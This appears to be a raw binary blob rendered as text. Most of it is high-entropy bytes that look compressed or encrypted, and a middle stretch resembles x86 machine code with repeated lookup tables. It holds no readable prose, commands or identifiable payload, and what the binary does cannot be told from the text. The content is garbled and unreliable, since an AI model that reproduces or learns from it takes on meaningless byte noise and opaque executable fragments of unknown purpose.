XI��T��%]g����ƅ�v���<�v/2�꓈��hI�s	�h���n2G�q%}ᏼ�&.��7�=��=��sΤe�a�e~�֐B}i�'!�P�\����G����a$�C���^���ۯq)�eGٽ��O^�[�
V����<m�o����c�h��(=V��;����ꑪš��l$O0r�@u��o����1<����^��l�N�{��Z���D��	q[�trqT3�x�� �C_L���7���^6��cT!��6�B����O̤���m�}�E4�M>�E�H����O��?˖��E_�y�5U$�MΌ*����Gm�u)Z��rW��p�6i%=N_?J#����+����?N��%�f]�y;��9�%���9H�Y�~�0� �^
s9�2	�P��3G���h0M��"e�$q���n�1�Wr>���*�d�d�lH`�qĠ�m�b���Z,��o1hv�K^w�ˍ v���%�����`+���#�!��ѣR�m�9S �E6w��Pn��KHV0ip�����w6`4(]�u"��,>a�����U�����'�W�*R	�C�?��0p�=���d�#���U�Qx�M�K>�����>�6L���=���y�dM��.p66턩 ���B3b=gʦ� �����ņ7H��m|&��iK�:t�~�R��Z���+���X�u�-(����1�a���_�l�RGZ��ɍ�g �s8��E�����Kcs��ʿ#��m��i��/I�D������c�k�࠭�I]G=bׅ?�o�)>���ʭC��ܴ�$,�<�S�v[`&H�������[w?|������j#sSC�.��ʄ���"VF+�@��!�eS~{�#>P�˔@J���:iI.A��y=�`���j?����TZ���[z!D�;^$J���g��{2R�M��XQ�~!W�(�h�+��Fh�Hj��p͏�+�M����^#;~"�$	�HY1(#_�W	'�m�z���Q�T��n;#�,�$�/�0���\w�"�Ҫ�~���J��BKJ��i$�~����@|�E0ə��rܹ?�9��[_\�\ ��   X X                                                                                         �F0�������������0Ӓf��P�]   �f1چ�f��Rwf��f��>f1Ӓ��vP�:   �0������Ƀ�������0�fQ�   RWWVQ�PUSh    �t$(�� N ��4$�(����v������(����4���R Ê �����4'��F �f�4�����Z6�fP����� ؃��������� �fY�����Z6�2����Z�����ZfY�
����Z���w���XfY��P��p���� ��Ѝv��4'�� �f��U���� ��������� �F�fP�9���Z�2�1�����<�4�&���[[]X�Y^_ZZ�Z6�����YfX6�����f��fR�����fZfY��fR������X���$!$������fZfYf��fR������Z�������>N ��R K�R ��R >N a�R K�R B�R >N �R K�R :�R >N ��R K�R ��R >N ��R K�R a�R >N '�R K�R ��R >N ��R K�R ��R >N ��R K�R ��R >N V�R K�R ,�R >N ��R K�R ��R >N IN K�R K�R >N 2N K�R �R >N ��R K�R K�R >N �R K�R �R >N a�R K�R ��R >N ��R K�R ��R j�R 2N ��R �R '�R B�R ��R #�R a�R �R :�R #�R ��R z�R  �R ��R ��R ��R  �R #�R ��R ��R C�R ��R ��R ,�R ��R �R E�R ��R :�R j�R a�R �R �R  �R ��R C�R a�R �R C�R ��R  �R B�R IN ��R C�R SN �R �R 2N C�R j�R V�R ��R ��R ��R '�R ��R ��R ��R ��R ��R #�R E�R �R ��R ��R ��R ��R  �R �R �R ,�R #�R r�R ��R ��R �R ��R '�R E�R a�R �R ��R ��R C�R ,�R ,�R '�R �R a�R ��R :�R ��R ��R �R �R ��R ��R ��R ��R ��R z�R ��R �R ��R ��R :�R ��R IN �R SN C�R ��R �R E�R u�R ��R ��R u�R  �R �R ��R ��R  �R SN ��R #�R �R j�R C�R ��R ��R �R ��R  �R j�R '�R ��R u�R j�R ��R C�R ��R ��R a�R ��R ��R ��R ��R B�R  �R ��R K�R ��R IN z�R ,�R �R ��R E�R �R �R ��R ��R �R �R ��R '�R #�R ��R z�R r�R �R K�R ��R C�R ��R V�R '�R ��R  �R SN  �R :�R r�R IN ��R �R ��R ��R Xf6� ����f\����fXfYf��fP�����Yf6�1����fXfY��fP�����Y�fP����XZfY��P��y���Yf�1�p���ZfX&��e���fYf$��Y���Zf��P���XZfY��P��B���fY $��7�����1����)����������x 5��{�ȍv��)�P�
�����R����f�f1؆�f-Rwf�Ѓ�f->f1�fP������$fZf!$���������U&|��"��s�P)hk�s�Ua
�[�ќ�?�4&�X(����]�3��n�}��[C��c��2=�c�)A���h�95�u��i�r���L��\/#��K�+l��^q�����"�����N.?_��'������Eo״��ը�j�E�
K3$[,��T���Ŧ�@˩!��(�wm����I���k��ݫ k�&�E>_�_�@<���f� V)r�C�����,�h�7Ր<w- q���:aI�d���3m瘈l"���
������D���� �Lx�V�ϕ�M���v����׋tW�EA-qr���I|g�;��� ����£Ă���^��ABޣ�IA�xt�5��e!�_�S��A�Jx�!�%�}y!R�W���k��B��� ���>��Ww�qjd�<�� �����K���xeA�������,t*�xw�1�?��ɦ���(=�Q�	�Ś5��|���{i�v�N�r�Qɤ:���i6}̾�_I�'xj��㴑�t8s�ְ�����깦�����,����M
���e�K�y��>����_�ŵ�'��ݗ-I�!�q<;J�F��́:���mS���@:W{`��� �>��\� ��d�b��@�>���ƅa�_r3�k�p'�Oa�=$(��ƛ����c����J���������C$��Hh �#\�3�J�[��$�{s���;�;�+XBw&-u���.zJm�ǖ|���"�"T[M���?)�V�$��z��+�@fj�}�6k��IM�nl.�j�7�*�7�rͦ$w�툀?9}��(�~n��4��#w_>���[k�������sZw�JA��o�OIqXw:IG,��b[3�\���J�"ݽc�:���ۢ��P(�&��N5E�~#�s��FB�=�̺g����
i��A�}�����K<���>�ַ��9�Fls���Ӊբ��m�w��l ��"�	,�Rsx��j�M�]OX'����ó�?���H��V�ȴ��Y\�[[�oq���Q&-�Ƹ�������>����p�^����SH�tŻ�:�xḎə޺�S�� �Kp��o�`�o�)\m�Ƃ���W~�k��������V�pL�;���c���e-���ar��(�\��VԦVI,��5.Z]�������P��}��Bq�XY)<\���j��*��;[���_�e�`���jM�k��B[+��KRs�#���x.�B��0%����- }M��,�3�zޤ�Y7����v������Fq���82:P�3�8<��y%�������%t+|N���[+qYʚ��t���Qù�Vb��=��hL ��|���6���W֊zy�L��.��3,�������:w<5�9Z��:�=0�L��O POfU����?�X�E��b�`�"k\��2�t��&y�����YZ�h=��t��bR�d}#�W�����(Ծw�h��x����)�xAgj��K]� ��耛r��$�R)���H!��O�����
���2����Z����;���x�r�����A���
3og�6NP����D��Ac����
d�'	���/�l�8�,Κ)�ͅep�8��Щ(ꗛ�fd�$u�:�љ��^)zNE.7 Q$t�ѿ���Q:���ե0�A�8����U�#-AݘY�Ie�9�̧��²�XI��9ΐ�G��@8�B�{�Ta��u��"i��ō5x�ʘu2T���	�9qx(U��?�"�k���N&�}t�x���dL�  �`�'O��8�1��H�_f�-_,�����p9Q2�V�;� ~���(��|��j�`Irw5�%�Ι������P��������'�%��i���>�?���Zԇ���6�ŏ6^�ק^�@��㠠� �H�Zɚ;���h�b����Obv|����7��ɂP�饏B��N+��d]��'��ץ����}�r���2�+�mh�r_.��f��x5
��l��se@�%N�<Z&����ɫ[�ѱ�x_�����²��Q"<�3F/�C2�
�U�<mf8:wDJ����,*�fګI�*b��_G�o�{r�^[:R�$�}��uN�!BP�Ҿ��l�Q3zE�C���@�q?5���ȇ81��;��<9R�a�����Rr
 ���b�40��e:���N�۹Q[�b~�_��<��y�楟�M!�9��)e��l��V�m�����u��P�]R�[G��8���H��'@���(���'UXG�H�Vހ�l.P��!��x$��tw�1��W�8����{���\�65.������Nt��4���-�H�^Efs�"�t��6�(q��#&%f�\M:��AdX��2)и�g
<��6{X�!�̑7��-T�V ,��P*�r��(2�BL
���ˉY���|�1>̨��ZM7������Hvatfw��	+��u����xo* ~��L|KMk}�(H�#A�ܣ�X�;���vI�Y=���&L��(���>�#~D�����̦P���dOw����6�a��ɦ��`�F��0����>"Z:�� ��
���=GZA��v��0PD��{T�В9	+&b�N��&1�����b@e�se^)E�ڮ�"����LJ�j�t�T�<�Gd��gb��ٶ��8�������q��R������U��J�BΧ�Yp��p+f٦�۰hy�9�
NA�B�9��%���x�U%Z|����R3^SN;(�;���Ւqj�e4�B
#l:� hY�'��@�4��a����饝n��Y�Q�!�س(�m��ڛ{�s.�&��W�C�F���1�d|~/s���{��S5�G���=	�	h�^VDkPTb�c7�&64����Y�{�xט)c-�!�^����6�!][��.��ߩIe\�m*��e^��R����euHQ���[#�K��U�W��\��6���g�iݣV@��=�YK�����W��<ã#ʀO�rC9�q!��lQ�������C���N����#�8���v�"�I~ѓ��!���0�ڇ+_�7
�R�xN2?:�5���x�Gqk�!�G<7/HE���f����PE�P$E�5�T)�*b_���9ԋӲ�lePpn�Wzzӷ���uښ�+�fm����/��i��JQ«e �3[�X��q�Cl�i�9�k��h��ﬦ�b�w6�;~P���7��$Q��=�s�L-#��� �t+J���x�8��w�0�@�D:d��Gk����+�A|e8��>V��M�����"s����f�B�,)���nU�g����H�8��k4h�Jț�<u=y�h�u9�w�����8���Ǳd4�_�9|I��A�gh`�R �V���hc�R �J���f�O�h��R �<����hF�R �1���smo9h$�R �#����l��h��R ������'h�S �����hE��8�����}�-�h�.{������ h!;/����Z���<�������������I�4$�  HɁ�,��9���<�������Y����7�宁���b��ځ�7b���C��������|#p���Ӎ���:��q���������FG��F����##j\��9)    